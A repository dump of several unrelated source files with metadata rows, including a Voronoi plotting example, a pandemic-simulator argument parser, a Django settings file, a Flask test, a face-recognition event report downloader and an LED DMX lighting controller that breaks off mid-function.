print("finished writing, wrote {0} triangles".format(len(triangleList)))
| [
"shihdan@hotmail.com"
] | shihdan@hotmail.com |
1558ad1012e5d828b2873a237cfb23be3d1281f7 | dec9f5cc5fc4617b7a37a95d76f6e7faba7e91e8 | /crear_lista_con_ceros.py | 89939a436b5d0a994a8bf1bc66bbb068f0612f5c | [] | no_license | jfernand196/Ejercicios-Python | d9ea39e37e241a6409c1ceed373c1bf6049944de | 1cedb16d2ada8ec5b67cec485fd0fc756b92953b | refs/heads/main | 2023-09-03T13:59:34.777020 | 2021-11-06T23:03:24 | 2021-11-06T23:03:24 | 421,098,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22 | py | arr=[0]*(4)
print(arr) | [
"jfernand196@gmail.com"
] | jfernand196@gmail.com |
0cfd39321abd018e157c9924d421b20f4473af3f | 1f5b6cd825f1a8b97de5ded0ec95931dd6f635af | /example.py | 2b1595011ad71cec36aae9840c55ec755ef35759 | [] | no_license | zalavin/voronoi | 735a37ae4dd17e9f9e31ce5085ce2fa03ba410d5 | 7e030bd1d657997962adfb75fc6485a176d51b60 | refs/heads/master | 2020-11-24T09:42:42.626272 | 2019-12-15T10:01:34 | 2019-12-15T10:01:34 | 228,088,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | import numpy as np
from scipy.spatial import Voronoi, voronoi_plot_2d
import matplotlib.pyplot as plt
points = np.array([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2],[2, 0], [2, 1], [2, 3.1]])
vor = Voronoi(points)
voronoi_plot_2d(vor)
plt.show() | [
"yztrnc@gmail.com"
] | yztrnc@gmail.com |
5cc818c213c3fdee9c98e03c04fc1653d0b66336 | c2209acf2147589057955e65b56c1ed4a142c228 | /simulator/run_helper.py | 225a079607d1342fbc48f1bc25530032f3d1b646 | [
"MIT"
] | permissive | sn4B/covid-19-pandemic-simulation | d4007461633e40664ad6be535396fd388d0286ea | ab8b48f01734fe1fdb4b3429dd69adebd3b3f62d | refs/heads/master | 2022-04-20T11:38:25.756363 | 2020-04-18T20:44:07 | 2020-04-18T20:44:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,469 | py | import argparse
from simulator.parameters import *
def get_parser():
parser = argparse.ArgumentParser(description='Please feed model parameters')
parser.add_argument('--nrun', type=int, help='Number of simulations', dest=nrun_key)
parser.add_argument('--nind', type=int, help='Number of individuals', dest=nindividual_key)
parser.add_argument('--nday', type=int, help='Number of days', dest=nday_key)
parser.add_argument('--sto-house', type=int, help='Number of store per house', dest=store_per_house_key)
parser.add_argument('--nblock', type=int, help='Number of blocks in the grid', dest=nb_block_key)
parser.add_argument('--remote-work', type=float, help='Percentage of people remote working', dest=remote_work_key)
parser.add_argument('--sto-pref', type=float, help='Probability going to nearest store', dest=store_preference_key)
parser.add_argument('--p-same-house', type=float, help='"Probability" for individuals for living in the same house'
, dest=same_house_p_key)
parser.add_argument('--inn-infec', type=float, help='Initial innoculation percentage',
dest=innoculation_pct_key)
parser.add_argument('--p-house', type=float, help='Probability of house infection', dest=house_infect_key)
parser.add_argument('--p-store', type=float, help='Probability of store infection', dest=store_infection_key)
parser.add_argument('--p-work', type=float, help='Probability of workplace infection', dest=work_infection_key)
parser.add_argument('--contagion-bounds', type=int, nargs=2, help='Contagion bounds', dest=contagion_bounds_key)
parser.add_argument('--hospitalization-bounds', type=int, nargs=2, help='Hospitalization bounds',
dest=hospitalization_bounds_key)
parser.add_argument('--death-bounds', type=int, nargs=2, help='Death bounds', dest=death_bounds_key)
parser.add_argument('--immunity-bounds', type=int, nargs=2, help='Immunity bounds', dest=immunity_bounds_key)
parser.add_argument('--population-state', '--pop', help='Draw population state graph', action='store_true')
parser.add_argument('--hospitalized-cases', '--hos', help='Draw hospitalized cases graph', action='store_true')
parser.add_argument('--new-cases', '--new', help='Draw new cases graph', action='store_true')
parser.add_argument('--summary', '--sum', help='Draw a pandemic summary', action='store_true')
return parser
| [
"biossamu@gmail.com"
] | biossamu@gmail.com |
969b80ee8cc4c17a50e1e211549d04546b0cd7db | 9e0b758019d9390ac09e25acc7c9b1ddcc6cb3b2 | /discord_mdext/standard_subset.py | 085a94df9f7b88616e327f8846fcfd7ec43e36bc | [
"Unlicense"
] | permissive | tsudoko/pullcord-export | 68fc6a8c6a980ca8b1de91b5c19987956a3c3447 | 6c6b296cb3437dbbf9896573ecb3f7d00e33b411 | refs/heads/master | 2020-04-29T12:21:24.729091 | 2019-11-03T22:04:32 | 2020-01-05T18:39:43 | 176,133,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | import markdown
class DiscordSubsetExtension(markdown.Extension):
def extendMarkdown(self, md):
"""Remove standard Markdown features not supported by Discord."""
md.registerExtension(self)
md.preprocessors.deregister("reference")
md.parser.blockprocessors.deregister("indent")
md.parser.blockprocessors.deregister("code")
md.parser.blockprocessors.deregister("hashheader")
md.parser.blockprocessors.deregister("setextheader")
md.parser.blockprocessors.deregister("hr")
md.parser.blockprocessors.deregister("olist")
md.parser.blockprocessors.deregister("ulist")
md.parser.blockprocessors.deregister("quote")
md.inlinePatterns.deregister("reference")
md.inlinePatterns.deregister("link")
md.inlinePatterns.deregister("image_link")
md.inlinePatterns.deregister("image_reference")
md.inlinePatterns.deregister("short_reference")
md.inlinePatterns.deregister("automail")
md.inlinePatterns.deregister("linebreak")
def makeExtension(**kwargs):
return DiscordSubsetExtension(**kwargs)
| [
"flan@flande.re"
] | flan@flande.re |
69cf78fe2c92ade2b933e5c22171f96f7cad2375 | 962dee99bceeae8d6b070cd3620ced13445db40a | /backdrop/test_webapp.py | 1d7570e72bef4addc3de4c3d4daf14fe22bf4cfd | [] | no_license | robyoung/backdroop | 6b3d86b3f7e7569ee954b5ae0b7872c1619cbe37 | 2a93463ac6792e95400b73c1ad2f6a7c31012e54 | refs/heads/master | 2018-12-28T19:20:05.226179 | 2014-04-11T08:53:14 | 2014-04-11T08:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | from .webapp import app
import unittest
import json
import pymongo
class FlaskTestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
def tearDown(self):
pymongo.Connection()['backdroop']['foobar'].drop()
def add_records(self):
payload = json.dumps([
{"_timestamp": "2012-12-12T12:12:12+00:00", "unique_visitors": 1234},
{"_timestamp": "2012-12-13T12:12;12+00:00", "unique_visitors": 4321},
{"_timestamp": "2012-12-21T12:12;12+00:00", "unique_visitors": 4321},
{"_timestamp": "2013-02-01T12:12;12+00:00", "unique_visitors": 4321},
])
self.app.post('/data-sets/foobar/data',
data=payload,
content_type='application/json')
def test_raw_query(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data')
data = json.loads(result.data)
assert len(data) == 4
assert data[0]['_timestamp'] == "2012-12-12T12:12:12+00:00"
assert data[1]['_timestamp'] == "2012-12-13T12:12:00+00:00"
def test_group_by(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data?group_by=unique_visitors')
data = json.loads(result.data)
assert len(data) == 2
assert data[0]['_count'] == 1
assert data[0]['unique_visitors'] == 1234
def test_period(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data?period=week')
data = json.loads(result.data)
assert len(data) == 3
assert data[0]['_start_at'] == "2012-12-10T00:00:00+00:00"
assert data[1]['_start_at'] == "2012-12-17T00:00:00+00:00"
if __name__ == '__main__':
unittest.main()
| [
"rob.young@digital.cabinet-office.gov.uk"
] | rob.young@digital.cabinet-office.gov.uk |
4a0cf341c54b5e86925e1e4083c443883922d80b | 23e40d2056bcadb28aad88ef58efb95461516072 | /main/settings.py | aab3cf8e575662e3a8938c00d1089bb561948ca2 | [] | no_license | drewvpham/dojo_secrets | 6436335005373ab93e3dd58e5943b918313f3fa9 | 120016c86d17643c59f6e18aff84d5ccb84b52b0 | refs/heads/master | 2021-01-22T04:15:15.385267 | 2017-05-30T21:47:34 | 2017-05-30T21:47:34 | 92,445,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | """
Django settings for main project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 's(u^ipke+4s%dj7x@pe0jk1i7)bki!#%n)0&=nl3$f0y6*tks0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.dojo_secrets',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'main.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'main.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"drewvpham@gmail.com"
] | drewvpham@gmail.com |
07440c9f25df6a45a8360071ab83f6fc63760930 | 355609e7d11f9bcccb1d72f3960dab197920d392 | /get_faces_events_v0.9.4.py | 73b07c412b5391ad8e8ec95b0cca3cae03753cc7 | [] | no_license | asnigirev/scripts | db82d094c6ff42ef9498d10890c76eca7fee58aa | 0527951148f3ea9308618e9d578650dd8aec0e86 | refs/heads/master | 2022-08-24T04:19:21.934572 | 2020-05-28T16:47:32 | 2020-05-28T16:47:32 | 267,643,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,755 | py | #!/usr/bin/python3
# Copyright (C) 2019 All rights reserved.
# Author Artem Snigirev <takeitawaytu@gmail.com>.
# -*- coding: utf-8 -*-
import sys
import os
import json
import requests
import csv
from requests.auth import HTTPBasicAuth
from datetime import datetime, timedelta
from dateutil import tz
import pytz
import getpass
print('Copyright (C) 2019 All rights reserved.\nAuthor Artem Snigirev <takeitawaytu@gmail.com>.\n\n\n\n\n')
print('Be careful, old files will be ERASED!!!\n\n')
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f'
local_tz = pytz.timezone('UTC')
verify = 'False'
output = 'result.csv'
html_output = 'face_report.html'
verbose = None
check = True
while check:
url = 'http://' + input('Please, enter server ip-address: ') + '/'
user = input('Login: ')
print('Don’t worry, the password will be typed, it’s just hidden')
passw = getpass.getpass()
print('Wait')
try:
resp = requests.post(url+'n7/n7session', auth=HTTPBasicAuth(user, passw))
result = resp.text
global n7token
n7token = result
if resp.status_code != 200:
print("\nInvalid credentials\n Try again...\n")
check = True
else:
check = False
# break
except Exception:
print("\nInvalid server address\n Try again...\n")
while True:
try:
since_date = input('Please, enter start date (Ex. YYYY-MM-DD): ')
since_time = input('Please, enter start time (Ex. hh:mm:ss): ')
since = str(since_date + 'T' + since_time + '.000')
until_date = input('Please, enter end date (Ex. YYYY-MM-DD): ')
until_time = input('Please, enter end time (Ex. hh:mm:ss): ')
until = str(until_date + 'T' + until_time + '.000')
since_timestamp = datetime.strptime(since, DATETIME_FORMAT).replace(tzinfo=tz.tzlocal())
until_timestamp = datetime.strptime(until, DATETIME_FORMAT).replace(tzinfo=tz.tzlocal())
except ValueError:
print("\nDate or Time is not correct\n Try again...\n")
else:
break
def erase_files(output, html_output):
html_header = ''
if output is not None:
with open(output, 'w', newline='') as out:
writer = csv_writer(out)
writer.writerow([
'{}'.format('first_name'),
'{}'.format('last_name'),
'{}'.format('face_id'),
'{}'.format('list_id'),
'{}'.format('similar'),
'{}'.format('channel_id'),
'{}'.format('date'),
'{}'.format('image_link'),
'{}'.format('eth_img_link')
])
out.close()
if html_output is not None:
with open(html_output, 'w', newline='') as out:
out.write(html_header)
out.close()
newpath = r'.\snapshots'
if not os.path.exists(newpath):
os.makedirs(newpath)
def csv_writer(out):
return csv.writer(out)
def get_photo(N, r, headers):
    """Download the event snapshot for face event *r* as snapshots/img(N).jpg.

    Side effects: sets the module globals `html` (the full snapshot URL)
    and `image_link` (local path of the saved jpeg) used later when the
    report row for this event is written.

    Raises IndexError when the event carries fewer than 3 snapshots;
    callers catch that and skip the event.
    """
    img_url = r['snapshots'][2]['path']
    global html
    # Strip the leading '.' from the relative path and prepend the server URL.
    html = url + img_url[1:]
    path_to_snapshot = 'snapshots/img(' + str(N) + ').jpg'
    global image_link
    image_link = path_to_snapshot
    img = requests.get(html, headers=headers)
    with open(path_to_snapshot, 'wb') as img_file:
        img_file.write(img.content)
    # (bug fix: removed a redundant second `image_link = path_to_snapshot`)
    print('snapshot: img(' + str(N) + ').jpg - has been downloaded')
def get_ethanol(N, headers, r, face_id, html):
    """Download the reference ("ethalon") image for event *r*.

    IDENTIFIED events fetch the enrolled face image via /n7/faces/<face_id>;
    NOT_IDENTIFIED events fall back to the event's own first snapshot.
    The image is saved as snapshots/img(N)ethalon.jpg and the module
    global `eth_img_link` is updated to that path.
    """
    state = r['params']['identity']['state']
    path_to_eth_snapshot = 'snapshots/img(' + str(N) + ')ethalon.jpg'
    if state == 'IDENTIFIED':
        path_to_eth = url + 'n7/faces/' + str(face_id)
        eth_img_url = requests.get(path_to_eth, headers=headers)
        res = json.loads(eth_img_url.text)
        # Relative path of the enrolled image; strip the leading '.'.
        res = res['images'][0]['image']
        eth_img = requests.get(url + res[1:], headers=headers)
    elif state == 'NOT_IDENTIFIED':
        path_to_eth = r['snapshots'][0]['path']
        path_to_eth = url + path_to_eth[1:]
        eth_img = requests.get(path_to_eth, headers=headers)
    else:
        # Bug fix: the original fell through here with its locals
        # undefined and crashed with NameError on any unexpected state.
        print('get_ethanol: unexpected identity state, skipping download')
        return
    with open(path_to_eth_snapshot, 'wb') as eth_img_f:
        eth_img_f.write(eth_img.content)
    global eth_img_link
    eth_img_link = path_to_eth_snapshot
    print('snapshot: eth(' + str(N) + ').jpg - has been downloaded')
def print_result(first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link):
    """Append one detection row to the global CSV report file `output`."""
    row = [str(first_name), str(last_name), str(face_id), str(list_id),
           str(similar), str(channel_id), str(date), str(image_link),
           str(eth_img_link)]
    with open(output, 'a', newline='') as report:
        csv_writer(report).writerow(row)
def build_html_headers(html_output):
    """Append the opening HTML boilerplate and the report table header row."""
    column_names = ['N', 'First_Name', 'Last_Name', 'Face_id', 'Facelist_id',
                    'Similarity', 'Channel_id', 'Time_stamp', 'Thumbnail',
                    'Person_photo']
    parts = [
        '<html>\n'
        '    <head>\n'
        '        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\n'
        '    </head>\n'
        '    <body>\n'
        '        <table border="1">\n'
        '            <tbody>\n'
        '                <tr>\n'
    ]
    parts.extend('                    <th>%s</th>\n' % name
                 for name in column_names)
    parts.append('                </tr>\n')
    with open(html_output, 'a', newline='') as report:
        report.write(''.join(parts))
def build_html_end(html_output):
    """Append the closing tags that terminate the report table and document."""
    closing_markup = (
        '            </tbody>\n'
        '        </table>\n'
        '    </body>\n'
        '</html>\n'
    )
    with open(html_output, 'a', newline='') as report:
        report.write(closing_markup)
def build_html_body(N, first_name, last_name, face_id, list_id, similar, channel_id, date, path_to_snapshot, path_to_eth_snapshot, html_output):
    """Append one <tr> report row: event fields plus the two image cells."""
    value_cell = '                <td>%s</td>\n'
    image_cell = (
        '                <td>\n'
        '                    <img style="width: 150px;" src="./%s">\n'
        '                </td>\n'
    )
    row_parts = ['            <tr align="middle">\n']
    for value in (N, first_name, last_name, face_id, list_id, similar,
                  channel_id, date):
        row_parts.append(value_cell % str(value))
    row_parts.append(image_cell % str(path_to_snapshot))
    row_parts.append(image_cell % str(path_to_eth_snapshot))
    row_parts.append('            </tr>\n')
    with open(html_output, 'a', newline='', encoding='utf-8') as report:
        report.write(''.join(row_parts))
def get_faces(*args):
    """Page through every 'FaceDetected' event in [since, until] and emit
    one CSV row and one HTML table row (with downloaded images) per event.

    Reads module globals: n7token, url, since_timestamp, until_timestamp
    (and, via the helpers, output/html_output). Fetches 240 events per
    request until the server returns an empty page.
    """
    check = True
    offset = 0  # paging offset into the server's event list
    N = 0       # running event counter, also used to name snapshot files
    while check is True:
        N = N  # no-op, kept from the original
        headers = {
            'Authorization': 'N7Session '+n7token
        }
        params = {
            "limit": "240",
            "offset": offset,
            "order_type": "asc",
            "since": since_timestamp,
            "since_by_start_time": "true",
            "topics": "FaceDetected",
            "until": until_timestamp
        }
        # NOTE(review): url already ends with '/', so this produces
        # '//n7/events'; most servers tolerate the double slash -- confirm.
        resp = requests.get(
            url+'/n7/events',
            headers=headers,
            params=params
        )
        result = resp.text
        resp = json.loads(result)
        cond = len(resp)  # events in this page; 0 terminates the loop
        for index, r in enumerate(resp):
            if r['params']['identity']['state'] == 'IDENTIFIED':
                # Rebinding resp is safe: the for loop already holds its
                # own iterator over the page list.
                resp = r['params']['identity']['persons'][0]
                first_name = resp['face']['first_name']
                last_name = resp['face']['last_name']
                face_id = resp['face']['id']
                list_id = resp['list']['id']
                similar = r['params']['identity']['persons'][0]['similarity']
                channel_id = r['channel']
                unc_date = r['start_time'].replace('Z', '')
                unc_date = datetime.strptime(unc_date, DATETIME_FORMAT)
                upd_date = local_tz.localize(unc_date)
                # Convert the UTC event time to Moscow local time.
                date = datetime.strftime(upd_date.astimezone(pytz.timezone('Europe/Moscow')), DATETIME_FORMAT)
                try:
                    get_photo(N, r, headers)
                    get_ethanol(N, headers, r, face_id, html)
                except IndexError:
                    # Event had no usable snapshot; skip it entirely.
                    continue
            elif r['params']['identity']['state'] == 'NOT_IDENTIFIED':
                first_name = 'Not'
                last_name = 'Identified'
                face_id = '-'
                list_id = '-'
                similar = '-'
                channel_id = r['channel']
                unc_date = r['start_time'].replace('Z', '')
                unc_date = datetime.strptime(unc_date, DATETIME_FORMAT)
                upd_date = local_tz.localize(unc_date)
                date = datetime.strftime(upd_date.astimezone(pytz.timezone('Europe/Moscow')), DATETIME_FORMAT)
                try:
                    get_photo(N, r, headers)
                    get_ethanol(N, headers, r, face_id, html)
                except IndexError:
                    continue
            # NOTE(review): if the state matched neither branch above, the
            # row below reuses variables from the previous event (or raises
            # NameError on the very first one) -- worth guarding.
            build_html_body(N, first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link, html_output)
            print(first_name, ' ', last_name, ', face id: ', face_id, ', facelist id: ', list_id, ', eventdate: ', date)
            print_result(first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link)
            N += 1
        offset += 240
        if cond == 0:
            check = False
# Main entry point: reset the report files, fetch and render all face
# events, then close out the HTML report.
if __name__ == '__main__':
    erase_files(output, html_output)
    build_html_headers(html_output)
    get_faces()
    build_html_end(html_output)
    input('Done, press "enter"')
| [
"51997250+asnigirev@users.noreply.github.com"
] | 51997250+asnigirev@users.noreply.github.com |
cfba4552095164906b3630255f73327a589c99c7 | d7ed341278eef549dcba6bdb4b0b3ce6062711c5 | /calc.py | f5716e289a104658c09008b53887f1a9fd5e2c88 | [] | no_license | JerryDSW/python_test | a005ba5667be441bdca16b39f32b8905dce06282 | 0ac04343a5876c00e7798c4af63b0e512aeeac40 | refs/heads/master | 2020-03-22T00:52:05.340391 | 2018-06-30T14:39:17 | 2018-06-30T14:39:17 | 139,269,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | def add(x, y):
pass
def subtract(x, y):
pass
def multipy(x, y):
return
def divide(x, y):
pass
def aquare(x):
pass
| [
"JerryWangDSW@gmail.com"
] | JerryWangDSW@gmail.com |
02621e8e9db32fa0801a84b3c0bc40d5521325dd | 898c75627c084ef05153423664742a8c4a1c279b | /aurora.py | 0e13a7148864c6bf59fb98be00064ef7b1e1b13c | [] | no_license | headrotor/aurora-DMX | 6ab32a3b0aa997027c188395bb634211aee436b2 | 5abae5addd10b9a67d5eba6c30df3fd2953e4fa7 | refs/heads/master | 2016-09-06T01:14:28.006584 | 2013-10-14T03:24:29 | 2013-10-14T03:24:29 | 9,930,111 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,298 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" This file contains classes to deal with the irregular structure of
the Aurora artwork
"PODs" are a group of 4 DMX-32 boards, each pod can support up to
4x32=128 DMX channels; at three channels per branch or 10 branches
per board, each pod can support 40 branches.
One DMX universe can only support 4 pods, labled A,B,C,D so the fifth
"E" pod is on a separate DMX universe."""
import sys
import struct
import time
import math
import colorsys
import ConfigParser
# local classes
import DMXthread
class Pod(object):
    """One pod: a group of 4 DMX-32 boards sharing a single DMX universe.

    A pod can drive up to 4 x 32 = 128 DMX channels, i.e. 40 RGB branches.
    """

    def __init__(self, name, universe):
        self.name = name          # pod label (e.g. 'podA' .. 'podE')
        self.universe = universe  # DMX universe serving this pod
        self.limbs = []           # Limb structures attached to this pod

    def printInfo(self):
        """Print a one-line summary: pod name and limb count."""
        summary = 'pod %s, num limbs: %d' % (self.name, len(self.limbs))
        print(summary)
# A "Limb" is a group of branches on the same physical pipe ("limb")
# It can have anywhere from 5 to 11 branches.
class Limb(object):
    """One physical pipe ("limb") carrying 5-11 Branch strips."""

    def __init__(self, name, nbranches):
        self.name = name
        # Slots are pre-filled with placeholder branches and replaced
        # one by one through addBranch().
        self.branches = [Branch(0, 0, 0, 0, (0, 0, 0))
                         for _ in range(nbranches)]

    def printInfo(self):
        """Print a one-line summary: limb name and branch count."""
        print('    limb %s, num branches: %d' % (self.name,
                len(self.branches)))

    def addBranch(self, n, branch):
        """Install *branch* into slot *n*, replacing the placeholder."""
        self.branches[n] = branch
# A "branch" is the simplest light unit, it is a single strip of RGB
# LED and can be set to any RGB color. There are 5-11 branches per
# limb and up to 40 branches per pod.
class Branch(object):
    """A single RGB LED strip: three consecutive DMX channels on one board.

    There are 5-11 branches per limb and up to 40 branches per pod.
    """

    def __init__(self, name, start, uni, board, channels):
        """Build a branch and precompute its absolute DMX channel numbers.

        name     -- branch label 'P-l-b' (pod letter, limb number, branch number)
        start    -- DMX start address of the owning board
        uni      -- index of the DMX universe this branch lives on
        board    -- board number within the pod
        channels -- (r, g, b) board-level channel triple, each 0-31
        """
        self.name = name
        self.start = start        # start address of this branch
        self.brindex = 0          # global branch index, assigned later
        self.board = board        # board in pod
        self.universe = uni       # universe of this branch from parent bd
        self.channels = channels  # triple of board-level channels (0-31)
        # Bug fix: the interpolation state was never initialized, so the
        # first setNextColor() call crashed reading self.thisHSV.
        self.lastHSV = (0.0, 0.0, 0.0)
        self.thisHSV = (0.0, 0.0, 0.0)
        if max(self.channels) > 32:
            print('ERROR: channel value out of range for branch ' + name)
            exit()
        # calculate DMX channel from start offset plus local channel
        self.DMX = [c + self.start - 1 for c in self.channels]
        if max(self.DMX) > 511:
            print('WARNING: DMX value out of range for branch ' + name)
            exit()

    def __str__(self):
        return '%s index %3s, bd: %d chan: %12s DMX[%s]: %s' % (
            self.name,
            self.brindex,
            self.board,
            self.channels,
            self.universe,
            self.DMX,
            )

    def printInfo(self):
        """Print this branch's one-line summary."""
        print(self.__str__())

    def setNextColor(self, hsv):
        """ Set a new color for interpolation"""
        self.lastHSV = self.thisHSV
        self.thisHSV = hsv

    def getTweenColor(self, factor):
        """return interpolated color from last color and this color"""
        # TODO: still unimplemented, as in the original.
        pass

    def getLimbIndex(self):
        """parse name to get limb index, eg A-2-4 is limb 2 (actually
        [1])"""
        data = self.name.split('-')
        return int(data[1]) - 1

    def getBranchIndex(self):
        """parse name to get br number on limb, eg A-2-4 is branch 4
        (actually [3])"""
        data = self.name.split('-')
        return int(data[2])
class AuroraDMX(object):
    """Top-level driver for the Aurora rig, built from a config file.

    Nomenclature: a pod holds 4 boards and supports up to 40 branches;
    there are 5 pods. A board drives 10 branches. A branch is one RGB
    strip, i.e. three DMX channels.
    """
    def __init__(self, cfgfile):
        self.branches = []  # flat list of Branch structs (filled by InitFromCfg)
        self.InitFromCfg(cfgfile)
        # One DMXUniverse device per configured universe (at most two).
        self.uni0 = DMXthread.DMXUniverse(self.universes[0])
        self.DMX = [self.uni0]  # array of DMX devices, 1 per universe
        if len(self.universes) > 1:
            self.uni1 = DMXthread.DMXUniverse(self.universes[1])
            self.DMX.append(self.uni1)
        else:
            self.uni1 = None
    def TreeSend(self, dstart=0, dend=0):
        # Flush the staged channel values out on every universe.
        # NOTE(review): dstart/dend are unused -- presumably meant as a
        # channel sub-range; confirm before relying on them.
        self.uni0.send_buffer()
        if self.uni1 is not None:
            self.uni1.send_buffer()
    def setChan(
        self,
        u,
        chan,
        fval,
        ):
        """ set the given channel to the given [0-1] floating value"""
        self.DMX[u].set_chan_float(chan, fval)
    def setChanInt(
        self,
        u,
        chan,
        intval,
        ):
        """ set the given channel to the given [0-255] int value"""
        # print "setting chan %d to %d" % (chan,intval)
        # sys.stdout.flush()
        self.DMX[u].set_chan_int(chan, intval)
    def setBranchInt(self, branch, rgb):
        """ set the three branch channels to the given RGB values """
        u = self.branches[branch].universe
        # Silently ignore branches on universes we have no device for.
        if u < len(self.DMX):
            self.setChanInt(u, self.branches[branch].DMX[0], rgb[0])
            self.setChanInt(u, self.branches[branch].DMX[1], rgb[1])
            self.setChanInt(u, self.branches[branch].DMX[2], rgb[2])
        else:
            # print "Warning: universe %d out of range" % u
            pass
    def setBranchRGB(self, branch, rgb):
        """ set the three branch channels to the given RGB values """
        u = self.branches[branch].universe
        if u < len(self.DMX):
            self.setChan(u, self.branches[branch].DMX[0], rgb[0])
            self.setChan(u, self.branches[branch].DMX[1], rgb[1])
            self.setChan(u, self.branches[branch].DMX[2], rgb[2])
        else:
            # print "Warning: universe %d out of range" % u
            pass
    def setBranchHSV(self, branch, hsv):
        """ set the branch to the given hue, sat, and value (bright) triple"""
        self.setBranchRGB(branch, colorsys.hsv_to_rgb(hsv[0], hsv[1], hsv[2]))
    def InitFromCfg(self, cfgfile):
        """ initialize all data structures from configuration file """
        self.cfg = ConfigParser.RawConfigParser()
        self.cfg.read(cfgfile)
        # how many universes? read any config items starting with "universe"
        universes = [item[1] for item in self.cfg.items('DMX')
                     if item[0].startswith('universe')]
        if len(universes) < 1:
            print 'no universes detected in config file! Bye.'
            exit()
        self.universes = universes
        print repr(universes)
        board_count = 0  # NOTE(review): never used below
        # get a list of pods
        podnames = self.cfg.get('pods', 'pods')
        podnames = podnames.split(',')
        self.pods = []
        for p in podnames:
            pname = 'pod' + p
            uni = self.cfg.getint(pname, 'universe')
            new_pod = Pod(pname, uni)
            # first, get start addresses of all boards
            nboards = len([item[1] for item in self.cfg.items(pname)
                          if item[0].startswith('board')])
            starts = [0] * nboards
            bnames = [(n, 'board' + str(n)) for n in range(nboards)]
            for (n, b) in bnames:
                starts[n] = self.cfg.getint(pname, b)
            #print 'pod ' + new_pod.name
            # get ordered list of limbs
            lnames = ['branch-1', 'branch-2', 'branch-3', 'branch-4',
                      'branch-5']
            for lname in lnames:  # for each limb
                # get list of branch names for this limb (ending with A, eg)
                lbrnames = [item[0] for item in self.cfg.items(pname)
                            if item[0].startswith(lname)]
                nbranches = len(lbrnames)
                if nbranches > 0:
                    # now we have list of branch names for this limb.
                    # make a new limb with this many branches
                    limb = Limb(p + lname, nbranches)
                    # now for every branch in this limb, add it to the Limb
                    for brname in lbrnames:
                        data = self.cfg.get(pname, brname)
                        data = [int(k) for k in data.split(',')]
                        # data is a list of [board, rchan,bchan,gchan]
                        board = data[0]
                        start = starts[board]  # start address for this branch
                        new_branch = Branch(p + brname, start, uni,
                                board, (data[1], data[2], data[3]))
                        data = brname.split('-')
                        index = int(data[2])
                        # print "adding branch %d" % index + new_branch.name
                        limb.addBranch(index, new_branch)
                        sys.stdout.flush()
                    new_pod.limbs.append(limb)
            self.pods.append(new_pod)
        # all boards read in. Now create list of limbs and branches[]
        # Build flat indices: self.limbs (per-pod lists), self.limblist
        # (flattened), and self.branches (every Branch, indexed globally).
        brcount = 0
        self.branches = []
        self.limbs = []
        self.limblist = []
        for pod in self.pods:
            self.limbs.append(pod.limbs)
            self.limblist.extend(pod.limbs)
            for lb in pod.limbs:
                for br in lb.branches:
